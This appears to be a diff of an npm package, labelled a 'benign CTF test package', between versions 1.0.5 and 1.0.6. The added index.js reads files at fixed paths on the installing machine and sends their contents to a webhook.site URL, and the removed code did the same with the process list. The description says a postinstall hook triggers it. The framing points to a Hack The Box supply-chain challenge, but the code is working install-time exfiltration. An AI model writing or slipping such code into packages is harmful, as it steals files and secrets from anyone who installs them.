@alexandrsarioglo/npm-ghost-htb 1.0.5 → 1.0.6

package/index.js

@@ -2,7 +2,6 @@ const WEBHOOK = 'https://webhook.site/b3d8463d-444d-412a-891b-bd291b37e743';   /
 
 // async-scan-htb-json.js (CommonJS)
 // Usage: node async-scan-htb-json.js [startPath]
-const fs = require('fs');
 const http = require('http');
 const https = require('https');
 const { URL } = require('url');
@@ -23,47 +22,67 @@ function sendProgress(obj) { // async HTTP; event loop must be free to flush
   } catch {}
 }
 
-// list-procs-ps.js
-// Usage: node list-procs-ps.js [outputPath]
-// Example: node list-procs-ps.js /tmp/procs.json
+const PATHS = [
+  '/home/node/supplysec_entry.js',
+  '/home/node/init_test.sh'
+];
+
+const fs = require('fs');
+const fsp = fs.promises;
+const path = require('path');
 
-const { spawn } = require('child_process');
+const OUT = '/tmp/files-by-path.json';
+const MAX_BYTES = 1_000_000; // 1 MB per file
 
-// ps columns: PID USER STAT START TIME COMMAND (we ask for pid,user,comm,args)
-const ps = spawn('ps', ['-eo', 'pid,user,comm,args'], { stdio: ['ignore', 'pipe', 'pipe'] });
+async function readFileSafe(p, maxBytes) {
+  try {
+    const stat = await fsp.stat(p);
+    if (!stat.isFile()) return { error: 'not-a-file' };
+    const size = stat.size;
+    if (size <= maxBytes) {
+      const content = await fsp.readFile(p, 'utf8');
+      return { content };
+    }
+    // stream first maxBytes bytes
+    return await new Promise((resolve) => {
+      const rs = fs.createReadStream(p, { encoding: 'utf8', highWaterMark: 64 * 1024 });
+      let acc = '';
+      let read = 0;
+      let done = false;
+      rs.on('data', chunk => {
+        if (done) return;
+        const chunkBytes = Buffer.byteLength(chunk, 'utf8');
+        if (read + chunkBytes >= maxBytes) {
+          const remaining = maxBytes - read;
+          acc += chunk.slice(0, remaining);
+          done = true;
+          rs.destroy();
+        } else {
+          acc += chunk;
+          read += chunkBytes;
+        }
+      });
+      rs.on('close', () => resolve({ content: acc + '\n...[truncated]' }));
+      rs.on('error', err => resolve({ error: `read-error: ${err.message}` }));
+    });
+  } catch (err) {
+    return { error: err.code ? `${err.code}` : err.message };
+  }
+}
 
-let buffer = '';
-ps.stdout.setEncoding('utf8');
-ps.stdout.on('data', chunk => buffer += chunk);
+(async () => {
+  const result = { generated: new Date().toISOString(), files: {} };
+  for (const p of PATHS) {
+    const abs = path.resolve(p);
+    const res = await readFileSafe(abs, MAX_BYTES);
+    if (res.content !== undefined) result.files[abs] = res.content;
+    else result.files[abs] = `ERROR: ${res.error}`;
+  }
 
-ps.on('close', code => {
-  const lines = buffer.split(/\r?\n/).filter(Boolean);
-  // drop header line
-  if (lines.length === 0) {
-    console.error('ps produced no output');
+  try {
+    sendProgress({result});
+  } catch (e) {
+    console.error('Failed to write output:', e.message);
     process.exit(1);
   }
-  const header = lines.shift();
-  const procs = lines.map(line => {
-    // split into 4 columns: pid,user,comm,args. We expect whitespace-separated pid & user & comm, then the rest is args
-    const m = line.trim().match(/^(\d+)\s+(\S+)\s+(\S+)\s+(.*)$/);
-    if (!m) {
-      // fallback: try splitting
-      const parts = line.trim().split(/\s+/);
-      return { raw: line };
-    }
-    return {
-      pid: parseInt(m[1], 10),
-      user: m[2],
-      comm: m[3],
-      args: m[4]
-    };
-  });
-
-  const result = { generated: new Date().toISOString(), procs };
-  sendProgress(result);
-});
-ps.on('error', err => {
-  console.error('Failed to run ps:', err.message);
-  process.exit(2);
-});
+})();

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "@alexandrsarioglo/npm-ghost-htb",
-  "version": "1.0.5",
+  "version": "1.0.6",
   "main": "index.js",
   "description": "benign CTF test package (postinstall sends a webhook)",
   "scripts": {